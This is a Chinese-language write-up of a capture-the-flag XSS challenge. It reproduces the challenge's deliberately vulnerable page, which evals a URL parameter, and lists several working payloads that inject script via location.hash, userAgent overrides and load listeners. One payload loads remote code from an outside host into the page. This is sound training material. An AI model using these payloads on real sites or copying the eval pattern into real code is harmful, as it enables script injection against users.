起始一次看到一位大牛放出的一个xss挑战页面,在iframe页面中执行xss即算完成.地址: http://server.n0tr00t.com/n0js/case2.html标准:
起始
一次看到一位大牛放出的一个xss挑战页面,在iframe页面中执行xss即算完成.地址: http://server.n0tr00t.com/n0js/case2.html标准: Please execute the jscode in the iframe(name=hi): prompt location.href Work: Chrome, Firefox
case2.html
<!DOCTYPE html><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>n0js case2</title> </head> <body style="margin: -10px 0px 0px 10px;"> <h1>[n0js] case2</h1> <span>Please execute the jscode in the iframe(name=hi): prompt location.href</span><br> <span>Work: Chrome, Firefox</span><br> <span>Datetime: 2016-12-14</span> <ul> <li>Submit: evi1m0.bat[at]gmail.com</li> <li>Casetip: dota2 pudge</li> <li>Subject by: evi1m0 / server.n0tr00t.com</li> </ul> <hr> <script> eval(eval((window.location.search.substring(1).split("=")[1]))); </script> <pre> <iframe name="hi" src="//server.n0tr00t.com/n0js/case2_test.html" style="width: 400px;height: 200px;"></iframe> </pre> </body></html>
case2_test.html
<script>function getos() { var sUserAgent = navigator.userAgent; var isWin = (navigator.platform == "Win32") || (navigator.platform == "Windows"); var isMac = (navigator.platform == "Mac68K") || (navigator.platform == "MacPPC") || (navigator.platform == "Macintosh") || (navigator.platform == "MacIntel"); if (isMac) return "Mac"; var isUnix = (navigator.platform == "X11") && !isWin && !isMac; if (isUnix) return "Unix"; var isLinux = (String(navigator.platform).indexOf("Linux") > -1); if (isLinux) return "Linux"; if (isWin) { var isWin2K = sUserAgent.indexOf("Windows NT 5.0") > -1 || sUserAgent.indexOf("Windows 2000") > -1; if (isWin2K) return "Win2000"; var isWinXP = sUserAgent.indexOf("Windows NT 5.1") > -1 || sUserAgent.indexOf("Windows XP") > -1; if (isWinXP) return "WinXP"; var isWin2003 = sUserAgent.indexOf("Windows NT 5.2") > -1 || sUserAgent.indexOf("Windows 2003") > -1; if (isWin2003) return "Win2003"; var isWinVista= sUserAgent.indexOf("Windows NT 6.0") > -1 || sUserAgent.indexOf("Windows Vista") > -1; if (isWinVista) return "WinVista"; var isWin7 = sUserAgent.indexOf("Windows NT 6.1") > -1 || sUserAgent.indexOf("Windows 7") > -1; if (isWin7) return "Win7"; } return "other";}document.write('OS:'+getos()+'<br>UA:'+window.parent.navigator.userAgent);</script>
分析
1. case2.html中js取url地址“="后面的值传入eval执行2. 页面先加载js,后加载的iframe3. url传入的参数带单引号,双引号都会被urlencode4. case2_test.html提示userAgent或许可用5. 开搞
解决
1. url应该是case2.html?test=payload2. 使用延时执行js;修改浏览器的navigator.platform属性;绑定监听页面load事件3. url地址“#”后面的单双引号等字符不会被编码
case1: 延时加载js
解法一:case2.html?a=location.hash.substr(1)#setTimeout("w=window['hi'];s=w.document.createElement('script');s.src='http://1.1.1.1/1.js';w.document.body.appendChild(s);", 2000) //@piaca解法二:case2.html?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500) // @fyth
case2: 修改浏览器属性
解法一:case2.html?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '<script>prompt(location.href)</script>';}}) //@gaoheby解法二:case2.html?a=location.hash.substr(1)#navigator.__defineGetter__('userAgent', function(){ return '<svg/onload=prompt(location.href)>'}) // @fyth解法三:case2.html?a=location.hash.substr(1)#var frame = document.createElement('iframe'); frame.style.display = 'none'; document.body.appendChild(frame); function navigator(){} window.navigator = new Proxy(window.frames[0].window.navigator, { get: function(n0t){return "<img src=@ onerror=alert(location.href)>";} }) // @evi1m0解法四:case2.html?a=location.hash.substr(1)#function createProperty(value){var _value=value;function _get(){return _value}function _set(v){_value=v}return{"get":_get,"set":_set}}; function makePropertyWritable(objBase,objScopeName,propName,initValue){var newProp,initObj;if(objBase&&objScopeName in objBase&&propName in objBase[objScopeName]) {if(typeof initValue==="undefined"){initValue=objBase[objScopeName][propName]}newProp=createProperty(initValue);try{Object.defineProperty(objBase[objScopeName],propName,newProp)} catch(e){initObj={};initObj[propName]=newProp;try{objBase[objScopeName]=Object.create(objBase[objScopeName],initObj)}catch(e){}}}}; makePropertyWritable(window,"navigator","userAgent"); window.navigator.userAgent="<script>prompt(location.href)</script>"; // 1124696276
case3: 绑定监听页面load属性
case2.html?test=location.hash.substr(1)#window.addEventListener('load', function(){window.hi.prompt(hi.location.href)})
最后
作者测试页面: http://server.n0tr00t.com/n0js/ 上面几个解法都来自此页面,作者又放出了一个case,欢迎感兴趣的去玩耍,多学习。MDN的 JavaScript文档: https://developer.mozilla.org/zh-CN/docs/Web/JavaScript 好好学习天天向上,thx piaca & NorthOrchid。